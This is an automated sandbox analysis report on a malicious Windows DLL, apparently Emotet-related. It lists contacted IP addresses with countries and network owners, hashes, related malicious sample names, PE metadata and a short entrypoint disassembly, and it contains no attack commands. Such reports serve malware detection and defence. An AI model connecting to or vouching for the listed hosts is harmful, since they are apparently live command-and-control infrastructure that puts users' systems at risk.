                          		30083AS-30083-GO-DADDY-COM-LLCUStrue
                          1.234.21.73
                          		unknownKorea Republic of
                          		9318SKB-ASSKBroadbandCoLtdKRtrue
                          176.56.128.118
                          		unknownSwitzerland
                          		12637SEEWEBWebhostingcolocationandcloudservicesITtrue
                          45.118.135.203
                          		unknownJapan63949LINODE-APLinodeLLCUStrue
                          167.99.115.35
                          		unknownUnited States
                          		14061DIGITALOCEAN-ASNUStrue
                          185.8.212.130
                          		unknownUzbekistan
                          		48979UZINFOCOMUZtrue
                          197.242.150.244
                          		unknownSouth Africa
                          		37611AfrihostZAtrue
                          51.91.76.89
                          		unknownFrance
                          		16276OVHFRtrue
                          178.79.147.66
                          		unknownUnited Kingdom
                          		63949LINODE-APLinodeLLCUStrue
                          45.176.232.124
                          		unknownColombia
                          		267869CABLEYTELECOMUNICACIONESDECOLOMBIASASCABLETELCOCtrue
                          31.24.158.56
                          		unknownSpain
                          		50926INFORTELECOM-ASEStrue
                          50.30.40.196
                          		unknownUnited States
                          		30083AS-30083-GO-DADDY-COM-LLCUStrue
                          164.68.99.3
                          		unknownGermany
                          		51167CONTABODEtrue
                          189.126.111.200
                          		unknownBrazil
                          		27715LocawebServicosdeInternetSABRtrue
                          146.59.226.45
                          		unknownNorway
                          		16276OVHFRtrue
                          58.227.42.236
                          		unknownKorea Republic of
                          		9318SKB-ASSKBroadbandCoLtdKRtrue
                          196.218.30.83
                          		unknownEgypt
                          		8452TE-ASTE-ASEGtrue
                          158.69.222.101
                          		unknownCanada
                          		16276OVHFRtrue
                          159.65.88.10
                          		unknownUnited States
                          		14061DIGITALOCEAN-ASNUStrue
                          101.50.0.91
                          		unknownIndonesia
                          		55688BEON-AS-IDPTBeonIntermediaIDtrue
                          195.154.133.20
                          		unknownFrance
                          		12876OnlineSASFRtrue
                          185.157.82.211
                          		unknownPoland
                          		42927S-NET-ASPLtrue
                          70.36.102.35
                          		unknownUnited States
                          		22439PERFECT-INTERNATIONALUStrue
                          103.43.46.182
                          		unknownIndonesia
                          		58397INFINYS-AS-IDPTInfinysSystemIndonesiaIDtrue
                          212.237.17.99
                          		unknownItaly
                          		31034ARUBA-ASNITtrue
                          212.24.98.99
                          		unknownLithuania
                          		62282RACKRAYUABRakrejusLTtrue
                          138.185.72.26
                          		unknownBrazil
                          		264343EmpasoftLtdaMeBRtrue
                          103.75.201.2
                          		unknownThailand
                          		133496CDNPLUSCOLTD-AS-APCDNPLUSCOLTDTHtrue
                          216.158.226.206
                          		unknownUnited States
                          		19318IS-AS-1UStrue
                          51.91.7.5
                          		unknownFrance
                          		16276OVHFRtrue
                          5.9.116.246
                          		unknownGermany
                          		24940HETZNER-ASDEtrue
                          188.44.20.25
                          		unknownMacedonia
                          		57374GIV-ASMKtrue
                          153.126.146.25
                          		unknownJapan7684SAKURA-ASAKURAInternetIncJPtrue
                          72.15.201.15
                          		unknownUnited States
                          		13649ASN-VINSUStrue
                          209.250.246.206
                          		unknownEuropean Union
                          		20473AS-CHOOPAUStrue
                          82.165.152.127
                          		unknownGermany
                          		8560ONEANDONE-ASBrauerstrasse48DEtrue
                          107.182.225.142
                          		unknownUnited States
                          		32780HOSTINGSERVICES-INCUStrue
                          50.116.54.215
                          		unknownUnited States
                          		63949LINODE-APLinodeLLCUStrue
                          131.100.24.231
                          		unknownBrazil
                          		61635GOPLEXTELECOMUNICACOESEINTERNETLTDA-MEBRtrue
                          46.55.222.11
                          		unknownBulgaria
                          		34841BALCHIKNETBGtrue
                          173.212.193.249
                          		unknownGermany
                          		51167CONTABODEtrue
                          176.104.106.96
                          		unknownSerbia
                          		198371NINETRStrue
                          192.99.251.50
                          		unknownCanada
                          		16276OVHFRtrue
                          45.142.114.231
                          		unknownGermany
                          		44066DE-FIRSTCOLOwwwfirst-colonetDEtrue
                          1.234.2.232
                          		unknownKorea Republic of
                          		9318SKB-ASSKBroadbandCoLtdKRtrue
                          203.114.109.124
                          		unknownThailand
                          		131293TOT-LLI-AS-APTOTPublicCompanyLimitedTHtrue
                          119.193.124.41
                          		unknownKorea Republic of
                          		4766KIXS-AS-KRKoreaTelecomKRtrue
                          129.232.188.93
                          		unknownSouth Africa
                          		37153xneeloZAtrue
                          159.8.59.82
                          		unknownUnited States
                          		36351SOFTLAYERUStrue
                          92.240.254.110
                          		unknownSlovakia (SLOVAK Republic)
                          		42005LIGHTSTORM-COMMUNICATIONS-SRO-SK-ASPeeringsSKtrue

                          Private

                          IP
                          192.168.2.1

                          General Information

                          Joe Sandbox Version:34.0.0 Boulder Opal
                          Analysis ID:632747
                          Start date and time: 24/05/202200:14:232022-05-24 00:14:23 +02:00
                          Joe Sandbox Product:CloudBasic
                          Overall analysis duration:0h 12m 57s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Sample file name:l2sFDHB0lp (renamed file extension from none to dll)
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                          Number of analysed new started processes analysed:24
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • HDC enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Detection:MAL
                          Classification:mal100.troj.evad.winDLL@18/2@0/59
                          EGA Information:
                          • Successful, ratio: 100%
                          HDC Information:
                          • Successful, ratio: 99.9% (good quality ratio 96.2%)
                          • Quality average: 82.3%
                          • Quality standard deviation: 25.2%
                          HCA Information:
                          • Successful, ratio: 96%
                          • Number of executed functions: 54
                          • Number of non-executed functions: 298
                          Cookbook Comments:
                          • Adjust boot time
                          • Enable AMSI
                          • Override analysis time to 240s for rundll32

                          Warnings

                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, wuapihost.exe
                          • Excluded IPs from analysis (whitelisted): 95.140.236.128, 20.223.24.244
                          • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ctldl.windowsupdate.com, arc.msn.com, wu-bg-shim.trafficmanager.net, ris.api.iris.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                          • Not all processes where analyzed, report is missing behavior information
                          • Report size exceeded maximum capacity and may have missing behavior information.
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.

                          Simulations

                          Behavior and APIs

                          TimeTypeDescription
                          00:17:39API Interceptor8x Sleep call for process: svchost.exe modified

                          Joe Sandbox View / Context

                          IPs

                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                          217.182.25.250h3CGwIXKW7.dllGet hashmaliciousBrowse
                            FC6cLk6kKz.dllGet hashmaliciousBrowse
                              ViiTOVGM74.dllGet hashmaliciousBrowse
                                0xnQJ1y1YE.dllGet hashmaliciousBrowse
                                  ntn3NlNh90.dllGet hashmaliciousBrowse
                                    8u6naZBcZi.dllGet hashmaliciousBrowse
                                      z0zJ7pAKCQ.dllGet hashmaliciousBrowse
                                        6eeJ2fpp8m.dllGet hashmaliciousBrowse
                                          form.xlsmGet hashmaliciousBrowse
                                            f5f5.dllGet hashmaliciousBrowse
                                              4c96.dllGet hashmaliciousBrowse
                                                RoundSliderCtrlDemo.dllGet hashmaliciousBrowse
                                                  RoundSliderCtrlDemo.dllGet hashmaliciousBrowse
                                                    gf.dllGet hashmaliciousBrowse
                                                      Emotet.dllGet hashmaliciousBrowse
                                                        meet.xlsmGet hashmaliciousBrowse
                                                          omicsonline.net.xlsGet hashmaliciousBrowse
                                                            OMICS Publishing Group.xlsGet hashmaliciousBrowse
                                                              HLI64723144993179077493.xlsGet hashmaliciousBrowse
                                                                SCAN4469_00016.xlsGet hashmaliciousBrowse
                                                                  151.106.112.196h3CGwIXKW7.dllGet hashmaliciousBrowse
                                                                    FC6cLk6kKz.dllGet hashmaliciousBrowse
                                                                      ViiTOVGM74.dllGet hashmaliciousBrowse
                                                                        0xnQJ1y1YE.dllGet hashmaliciousBrowse
                                                                          ntn3NlNh90.dllGet hashmaliciousBrowse
                                                                            8u6naZBcZi.dllGet hashmaliciousBrowse
                                                                              z0zJ7pAKCQ.dllGet hashmaliciousBrowse
                                                                                6eeJ2fpp8m.dllGet hashmaliciousBrowse
                                                                                  form.xlsmGet hashmaliciousBrowse
                                                                                    PO_04-29-2022_0929.lnkGet hashmaliciousBrowse
                                                                                      PO_04-29-2022_0929.lnkGet hashmaliciousBrowse
                                                                                        3ZhWeY0JJo.zipGet hashmaliciousBrowse
                                                                                          form.xlsGet hashmaliciousBrowse
                                                                                            3866892832495839346959952.xlsGet hashmaliciousBrowse
                                                                                              form.xlsGet hashmaliciousBrowse
                                                                                                VEuIqlISMa.vbsGet hashmaliciousBrowse
                                                                                                  6874878548319557371921810184.lnkGet hashmaliciousBrowse
                                                                                                    5751879411642263817.doc.lnkGet hashmaliciousBrowse
                                                                                                      75744364019255557019031792.xlsGet hashmaliciousBrowse
                                                                                                        91382109147537561.xlsGet hashmaliciousBrowse

                                                                                                          Domains

                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                          windowsupdatebg.s.llnwi.netAb3H4LpmYj.dllGet hashmaliciousBrowse
                                                                                                          • 178.79.242.0
                                                                                                          W1R7nTPOeV.dllGet hashmaliciousBrowse
                                                                                                          • 95.140.230.128
                                                                                                          400.xlsxGet hashmaliciousBrowse
                                                                                                          • 178.79.242.128
                                                                                                          rv1H815ekx.exeGet hashmaliciousBrowse
                                                                                                          • 178.79.225.0
                                                                                                          Rechnung.xlsGet hashmaliciousBrowse
                                                                                                          • 95.140.236.128
                                                                                                          DETAILS 25922194612.xlsGet hashmaliciousBrowse
                                                                                                          • 95.140.230.192
                                                                                                          Rechnungskorrektur.xlsGet hashmaliciousBrowse
                                                                                                          • 95.140.236.128
                                                                                                          melimar.com.xlsGet hashmaliciousBrowse
                                                                                                          • 178.79.242.0
                                                                                                          AGK-010522 MJEY-210522.xlsGet hashmaliciousBrowse
                                                                                                          • 178.79.225.128
                                                                                                          HSBC_Customer Payment Copy_Pdf.exeGet hashmaliciousBrowse
                                                                                                          • 95.140.236.0
                                                                                                          kdANVaYsIg.exeGet hashmaliciousBrowse
                                                                                                          • 178.79.225.0
                                                                                                          bhZzJa0K7B.exeGet hashmaliciousBrowse
                                                                                                          • 178.79.225.0
                                                                                                          lRd2B3XIKE.exeGet hashmaliciousBrowse
                                                                                                          • 95.140.230.128
                                                                                                          M7GdKu4Giv.dllGet hashmaliciousBrowse
                                                                                                          • 95.140.230.192
                                                                                                          Hr5V6ZHTKv.dllGet hashmaliciousBrowse
                                                                                                          • 178.79.225.128
                                                                                                          0xnQJ1y1YE.dllGet hashmaliciousBrowse
                                                                                                          • 95.140.230.192
                                                                                                          M8WPxI5dUq.dllGet hashmaliciousBrowse
                                                                                                          • 95.140.230.192
                                                                                                          RyxCHM5yNz.dllGet hashmaliciousBrowse
                                                                                                          • 95.140.230.192
                                                                                                          IakisE3UQP.dllGet hashmaliciousBrowse
                                                                                                          • 95.140.230.128
                                                                                                          ytOneM9rNb.dllGet hashmaliciousBrowse
                                                                                                          • 95.140.230.192

                                                                                                          ASNs

                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                          OVHFRY9OXhH5KoE.dllGet hashmaliciousBrowse
                                                                                                          • 149.56.131.28
                                                                                                          h3CGwIXKW7.dllGet hashmaliciousBrowse
                                                                                                          • 192.99.251.50
                                                                                                          vB7vDn9SwA.dllGet hashmaliciousBrowse
                                                                                                          • 54.37.228.122
                                                                                                          iH3hkt6Jwi.dllGet hashmaliciousBrowse
                                                                                                          • 54.37.228.122
                                                                                                          uYq6PE4Nfv.dllGet hashmaliciousBrowse
                                                                                                          • 149.56.131.28
                                                                                                          KZhK3WeFEd.dllGet hashmaliciousBrowse
                                                                                                          • 54.37.228.122
                                                                                                          LRAnsY0n7j.dllGet hashmaliciousBrowse
                                                                                                          • 54.38.242.185
                                                                                                          Ab3H4LpmYj.dllGet hashmaliciousBrowse
                                                                                                          • 54.38.242.185
                                                                                                          IBP9x2Auu4.dllGet hashmaliciousBrowse
                                                                                                          • 149.56.131.28
                                                                                                          o96osW4H1R.dllGet hashmaliciousBrowse
                                                                                                          • 54.37.228.122
                                                                                                          ukt6lRh9kG.dllGet hashmaliciousBrowse
                                                                                                          • 54.38.242.185
                                                                                                          vSDDpyhqrI.dllGet hashmaliciousBrowse
                                                                                                          • 54.37.228.122
                                                                                                          u7iYcA4HMx.dllGet hashmaliciousBrowse
                                                                                                          • 54.38.242.185
                                                                                                          OOhRw8yIMK.dllGet hashmaliciousBrowse
                                                                                                          • 54.37.228.122
                                                                                                          OsA8ENdK32.dllGet hashmaliciousBrowse
                                                                                                          • 149.56.131.28
                                                                                                          SecuriteInfo.com.W32.AIDetect.malware2.5834.exeGet hashmaliciousBrowse
                                                                                                          • 51.161.104.138
                                                                                                          http://www.smsuu.org/Get hashmaliciousBrowse
                                                                                                          • 51.83.138.44
                                                                                                          SecuriteInfo.com.W32.AIDetectNet.01.18103.exeGet hashmaliciousBrowse
                                                                                                          • 51.89.179.209
                                                                                                          3DP_Net.exeGet hashmaliciousBrowse
                                                                                                          • 66.70.181.7
                                                                                                          RFQ-Order List.exeGet hashmaliciousBrowse
                                                                                                          • 149.56.80.19

                                                                                                          JA3 Fingerprints

                                                                                                          No context

                                                                                                          Dropped Files

                                                                                                          No context

                                                                                                          Created / dropped Files

                                                                                                          C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

                                                                                                          Download File
                                                                                                          Process:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                          File Type:Microsoft Cabinet archive data, 61480 bytes, 1 file
                                                                                                          Category:dropped
                                                                                                          Size (bytes):61480
                                                                                                          Entropy (8bit):7.9951219482618905
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:1536:kmu7iDG/SCACih0/8uIGantJdjFpTE8lTeNjiXKGgUN:CeGf5gKsG4vdjFpjlYeX9gUN
                                                                                                          MD5:B9F21D8DB36E88831E5352BB82C438B3
                                                                                                          SHA1:4A3C330954F9F65A2F5FD7E55800E46CE228A3E2
                                                                                                          SHA-256:998E0209690A48ED33B79AF30FC13851E3E3416BED97E3679B6030C10CAB361E
                                                                                                          SHA-512:D4A2AC7C14227FBAF8B532398FB69053F0A0D913273F6917027C8CADBBA80113FDBEC20C2A7EB31B7BB57C99F9FDECCF8576BE5F39346D8B564FC72FB1699476
                                                                                                          Malicious:false
                                                                                                          Preview:MSCF....(.......,...................I........y.........Tbr .authroot.stl..$..4..CK..<Tk...c_.d....A.K.....Y.f....!.))$7*I.....e..eKT..k....n.3.......S..9.s.....3H.Mh......qV.=M6.=.4.F.....V:F..]......B`....Q...c"U.0.n....J.....4.....i7s..:.27....._...+).lE..he.4|.?,...h....7..PA..b.,. .....#1+..o...g.....2n1m...=.......Dp.;..f..ljX.Dx..r<'.1RI3B0<w.D.z..)D|..8<..c+..'XH..K,.Y..d.j.<.A.......l_lVb[w..rDp...'.....nL....!G.F....f.fX..r.. ?.....v(...L..<.\.Z..g;.>.0v...P ......|...A..(..x...T0.`g...c..7.U?...9.p..a..&..9......sV..l0..D..fhi..h.F....q...y.....Mq].4..Z.....={L....AS..9.....:.:.........+..P.N....EAQ.V. sr.....y.B.`.Efe..8../....$...y-.q.J.......nP...2.Q8...O........M.@\.>=X....V..z.4.=.@...ws.N.M3.S.c?.....C4]?..\.K.9......^...CU......O....X.`........._.gU...*..V.{V6..m..D.-|.Q.t.7.....9.~....[...I.<e...~$..>......s.I.S....~1..IV.2Ri:..]R!8...q...l.X.%.)@......2.gb,t...}..;...@.Z..<q..y..:...e3..cY.we.$....z..| .#.......I...

                                                                                                          C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                                                                                                          Download File
                                                                                                          Process:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                          File Type:data
                                                                                                          Category:modified
                                                                                                          Size (bytes):290
                                                                                                          Entropy (8bit):2.9380604305618476
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6:kK3AoxN+SkQlPlEGYRMY9z+4KlDA3RUe/:/akPlE99SNxAhUe/
                                                                                                          MD5:A8A90B2CC4B49AB61ECBB670692B585F
                                                                                                          SHA1:A1437C8A1531A29E55AAF87E0F498C538A6EC56A
                                                                                                          SHA-256:B8A8BDD69375EB5BA5C1EA945685043DFEBCE708F8404C97D24430DE7A68424C
                                                                                                          SHA-512:ADC84D0B598FFB4159946CE75BC5312E0B15753E6F4A4FD4FB0C5C6928E1EA8861BE6741A15ADA8C694AA7B37ED134EFFC94BDDDFE3D37065A4C62488AD1C8C5
                                                                                                          Malicious:false
                                                                                                          Preview:p...... ........HqM3>o..(....................................................... ........3k/"[..................(...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...

                                                                                                          Static File Info

                                                                                                          General

                                                                                                          File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                          Entropy (8bit):6.352816951557855
                                                                                                          TrID:
                                                                                                          • Win32 Dynamic Link Library (generic) (1002004/3) 98.32%
                                                                                                          • Windows Screen Saver (13104/52) 1.29%
                                                                                                          • Generic Win/DOS Executable (2004/3) 0.20%
                                                                                                          • DOS Executable Generic (2002/1) 0.20%
                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                          File name:l2sFDHB0lp.dll
                                                                                                          File size:655360
                                                                                                          MD5:b6ca42b6646e847ad826ebfc2e68d554
                                                                                                          SHA1:cc06a349b47ca49503d5e2da477642c4fa95af8f
                                                                                                          SHA256:91df13870c9b89883c0547af0c23b6c45d262781c593449a3356c0989ba88774
                                                                                                          SHA512:8cfb77fb4e293043a991fc5d9f4c9c5fde1fe09156ba3b309f0a8a26f1f09524f232700f9b596acdf3e281505b9cc34323a5edc338a65c962281820c73e24519
                                                                                                          SSDEEP:6144:/6ZMFXzqfoSHr/mvcQYbi2HN8C8BgifO7y7qcuVqrWLWN7Ypsi6Ih9vH0/oUHahE:/8MFX47ivcQMNsrDrKJjO69cI
                                                                                                          TLSH:02D47C0EFFD1C1B2D36B123019D5C64823ADBF2CEAA1C5B777A8BE1D69326C14512B16
                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......)..0m..cm..cm..c...cg..c...ck..c~..co..c...c|..cm..c@..ch..cq..ch..c...cF..cd..ch..c...ch..cl..c...cl..ch..cl..cRichm..c.......

                                                                                                          File Icon

                                                                                                          Icon Hash:c0cc4c687ccccc78

                                                                                                          Static PE Info

                                                                                                          General

                                                                                                          Entrypoint:0x1001131c
                                                                                                          Entrypoint Section:.text
                                                                                                          Digitally signed:false
                                                                                                          Imagebase:0x10000000
                                                                                                          Subsystem:windows gui
                                                                                                          Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED
                                                                                                          DLL Characteristics:
                                                                                                          Time Stamp:0x623CFB7E [Thu Mar 24 23:15:10 2022 UTC]
                                                                                                          TLS Callbacks:
                                                                                                          CLR (.Net) Version:
                                                                                                          OS Version Major:4
                                                                                                          OS Version Minor:0
                                                                                                          File Version Major:4
                                                                                                          File Version Minor:0
                                                                                                          Subsystem Version Major:4
                                                                                                          Subsystem Version Minor:0
                                                                                                          Import Hash:d63ab94f4bb6b5d2f0f6092bf07e00ac

                                                                                                          Entrypoint Preview

                                                                                                          Instruction
                                                                                                          push 0000000Ch
                                                                                                          push 10041D40h
                                                                                                          call 00007FADB90F37B1h
                                                                                                          xor eax, eax
                                                                                                          inc eax
                                                                                                          mov dword ptr [ebp-1Ch], eax
                                                                                                          mov esi, dword ptr [ebp+0Ch]
                                                                                                          xor edi, edi
                                                                                                          cmp esi, edi
                                                                                                          jne 00007FADB90F25CEh
                                                                                                          cmp dword ptr [1004F3C8h], edi
                                                                                                          je 00007FADB90F2679h
                                                                                                          mov dword ptr [ebp-04h], edi
                                                                                                          cmp esi, eax
                                                                                                          je 00007FADB90F25C7h
                                                                                                          cmp esi, 02h
                                                                                                          jne 00007FADB90F25F3h
                                                                                                          mov eax, dword ptr [10050CB4h]
                                                                                                          cmp eax, edi
                                                                                                          je 00007FADB90F25CEh
                                                                                                          push dword ptr [ebp+10h]
                                                                                                          push esi
                                                                                                          push dword ptr [ebp+08h]
                                                                                                          call eax
                                                                                                          mov dword ptr [ebp-1Ch], eax
                                                                                                          cmp dword ptr [ebp-1Ch], edi
                                                                                                          je 00007FADB90F264Bh
                                                                                                          push dword ptr [ebp+10h]
                                                                                                          push esi
                                                                                                          push dword ptr [ebp+08h]
                                                                                                          call 00007FADB90F23E7h
                                                                                                          mov dword ptr [ebp-1Ch], eax
                                                                                                          cmp eax, edi
                                                                                                          je 00007FADB90F2634h
                                                                                                          mov ebx, dword ptr [ebp+10h]
                                                                                                          push ebx
                                                                                                          push esi
                                                                                                          push dword ptr [ebp+08h]
                                                                                                          call 00007FADB90E7358h
                                                                                                          mov dword ptr [ebp-1Ch], eax
                                                                                                          cmp esi, 01h
                                                                                                          jne 00007FADB90F25D0h
                                                                                                          cmp eax, edi
                                                                                                          jne 00007FADB90F25CCh
                                                                                                          push ebx
                                                                                                          push edi
                                                                                                          push dword ptr [ebp+08h]
                                                                                                          call 00007FADB90F23BDh
                                                                                                          cmp esi, edi
                                                                                                          je 00007FADB90F25C7h
                                                                                                          cmp esi, 03h
                                                                                                          jne 00007FADB90F25EBh
                                                                                                          push ebx
                                                                                                          push esi
                                                                                                          push dword ptr [ebp+08h]
                                                                                                          call 00007FADB90F23AAh
                                                                                                          test eax, eax
                                                                                                          jne 00007FADB90F25C5h
                                                                                                          mov dword ptr [ebp-1Ch], edi
                                                                                                          cmp dword ptr [ebp-1Ch], edi
                                                                                                          je 00007FADB90F25D5h
                                                                                                          mov eax, dword ptr [10050CB4h]
                                                                                                          cmp eax, edi
                                                                                                          je 00007FADB90F25CCh
                                                                                                          push ebx
                                                                                                          push esi
                                                                                                          push dword ptr [ebp+08h]
                                                                                                          call eax
                                                                                                          mov dword ptr [ebp-1Ch], eax
                                                                                                          or dword ptr [ebp-04h], FFFFFFFFh
                                                                                                          mov eax, dword ptr [ebp-1Ch]
                                                                                                          jmp 00007FADB90F25DCh
                                                                                                          mov eax, dword ptr [ebp-14h]
                                                                                                          mov ecx, dword ptr [eax]

                                                                                                          Rich Headers

                                                                                                          Programming Language:
                                                                                                          • [ASM] VS2003 (.NET) build 3077
                                                                                                          • [LNK] VS2003 (.NET) build 3077
                                                                                                          • [RES] VS2003 (.NET) build 3077
                                                                                                          • [EXP] VS2003 (.NET) build 3077
                                                                                                          • [C++] VS2003 (.NET) build 3077
                                                                                                          • [ C ] VS2003 (.NET) build 3077

                                                                                                          Data Directories

                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x4aa400x6e.rdata
                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x488440x104.rdata
                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x510000x480a0.rsrc
                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x9a0000x4e40.reloc
                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x438300x48.rdata
                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x3c0000x668.rdata
                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x487bc0x40.rdata
                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                          Sections

                                                                                                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                          .text0x10000x3a49e0x3b000False0.600941803496data6.61163923679IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                          .rdata0x3c0000xeaae0xf000False0.32216796875data5.04668369528IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                          .data0x4b0000x5cb80x3000False0.251383463542data3.83461094959IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                          .rsrc0x510000x480a00x49000False0.552453446062data6.07779046742IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                          .reloc0x9a0000x88100x9000False0.350667317708data4.48951519418IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                          Resources

                                                                                                          NameRVASizeTypeLanguageCountry
                                                                                                          \x428\x428\x428\x41e0x747c00x20800data
                                                                                                          RT_CURSOR0x950280x134data
                                                                                                          RT_CURSOR0x951600xb4data
                                                                                                          RT_CURSOR0x952400x134AmigaOS bitmap font
                                                                                                          RT_CURSOR0x953900x134data
                                                                                                          RT_CURSOR0x954e00x134data
                                                                                                          RT_CURSOR0x956300x134data
                                                                                                          RT_CURSOR0x957800x134data
                                                                                                          RT_CURSOR0x958d00x134data
                                                                                                          RT_CURSOR0x95a200x134data
                                                                                                          RT_CURSOR0x95b700x134data
                                                                                                          RT_CURSOR0x95cc00x134data
                                                                                                          RT_CURSOR0x95e100x134data
                                                                                                          RT_CURSOR0x95f600x134AmigaOS bitmap font
                                                                                                          RT_CURSOR0x960b00x134data
                                                                                                          RT_CURSOR0x962000x134data
                                                                                                          RT_CURSOR0x963500x134data
                                                                                                          RT_BITMAP0x522e00x428data
                                                                                                          RT_BITMAP0x520c00xe0GLS_BINARY_LSB_FIRSTSpanishMexico
                                                                                                          RT_BITMAP0x965a00xb8data
                                                                                                          RT_BITMAP0x966580x144data
                                                                                                          RT_ICON0x52a980x10828dBase III DBT, version number 0, next free block index 40
                                                                                                          RT_ICON0x632d80x10828dBase III DBT, version number 0, next free block index 40
                                                                                                          RT_ICON0x73b180x2e8data
                                                                                                          RT_ICON0x73e000x128GLS_BINARY_LSB_FIRST
                                                                                                          RT_ICON0x73f500x2e8data
                                                                                                          RT_ICON0x742380x128GLS_BINARY_LSB_FIRST
                                                                                                          RT_ICON0x743880x2e8data
                                                                                                          RT_ICON0x746700x128GLS_BINARY_LSB_FIRST
                                                                                                          RT_MENU0x527280x23adata
                                                                                                          RT_MENU0x521b00x46dataSpanishMexico
                                                                                                          RT_DIALOG0x529680x12cdata
                                                                                                          RT_DIALOG0x521f80xe2dataSpanishMexico
                                                                                                          RT_DIALOG0x964a00xfedata
                                                                                                          RT_STRING0x968100x92data
                                                                                                          RT_STRING0x967a00x6adataSpanishMexico
                                                                                                          RT_STRING0x968a80x48data
                                                                                                          RT_STRING0x969380x19edata
                                                                                                          RT_STRING0x96c080x280data
                                                                                                          RT_STRING0x970100x39cdata
                                                                                                          RT_STRING0x96f900x7adata
                                                                                                          RT_STRING0x96ad80x12edata
                                                                                                          RT_STRING0x96e880x104data
                                                                                                          RT_STRING0x968f00x46data
                                                                                                          RT_STRING0x973b00x128data
                                                                                                          RT_STRING0x974d80x240data
                                                                                                          RT_STRING0x977180x9edata
                                                                                                          RT_STRING0x977b80xb0Hitachi SH big-endian COFF object file, not stripped, 16640 sections, symbol offset=0x69007200, 201344768 symbols, optional header size 29952
                                                                                                          RT_STRING0x978680x30data
                                                                                                          RT_STRING0x978980x1d0data
                                                                                                          RT_STRING0x97a680x5bcdata
                                                                                                          RT_STRING0x984180x31cdata
                                                                                                          RT_STRING0x981180x300data
                                                                                                          RT_STRING0x98fa00xb0data
                                                                                                          RT_STRING0x980280xeedata
                                                                                                          RT_STRING0x98e500x11edata
                                                                                                          RT_STRING0x987380x4d0data
                                                                                                          RT_STRING0x98c080x248data
                                                                                                          RT_STRING0x98f700x2edata
                                                                                                          RT_STRING0x990500x4cdata
                                                                                                          RT_ACCELERATOR0x94fc00x68data
                                                                                                          RT_GROUP_CURSOR0x952180x22Lotus unknown worksheet or configuration, revision 0x2
                                                                                                          RT_GROUP_CURSOR0x95a080x14Lotus unknown worksheet or configuration, revision 0x1
